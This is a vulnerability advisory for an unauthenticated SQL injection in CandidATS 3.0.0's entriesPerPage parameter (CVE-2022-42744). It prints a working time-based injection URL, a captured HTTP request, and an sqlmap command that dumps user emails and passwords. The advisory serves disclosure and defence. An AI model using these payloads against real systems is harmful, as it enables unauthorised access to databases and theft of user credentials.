CandidATS 3.0.0 - SQLi via entriesPerPage

Summary

Vulnerability

Description

CandidATS version 3.0.0 allows an external attacker to perform CRUD operations on the application databases. This is possible because the application does not correctly validate the entriesPerPage parameter against SQLi attacks.

Vulnerability

The SQLi present in CandidATS 3.0.0 allows an unauthenticated remote attacker to perform CRUD operations on the application database. To trigger this vulnerability, we will need to send a malicious SQL query in the entriesPerPage parameter.

• https://demo.candidats.net/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15+AND+sleep(5)--+&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0

Exploitation

In this attack we will obtain the logs containing the emails and passwords of the users. To achieve this we will need 3 things:

candidATS.req

The request of the application, we save it in a file.

GET /ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/2
Host: demo.candidats.net
Cookie: CATS=1eiuqu2acq6t6tcguhcof52eha
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

SqlMap Command

By executing this command, we will obtain the records of our interest.

sqlmap -r candidATS.req -p entriesPerPage -D prfkvqsyht -T user -C email,password --dump

Dump DB

Finally we see how we managed to compromise user records.

Our security policy

We have reserved the CVE-2022-42744 to refer to this issue from now on.

• https://fluidattacks.com/advisories/policy/

System Information

• Version: CandidATS 3.0.0

• Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://candidats.net/

Timeline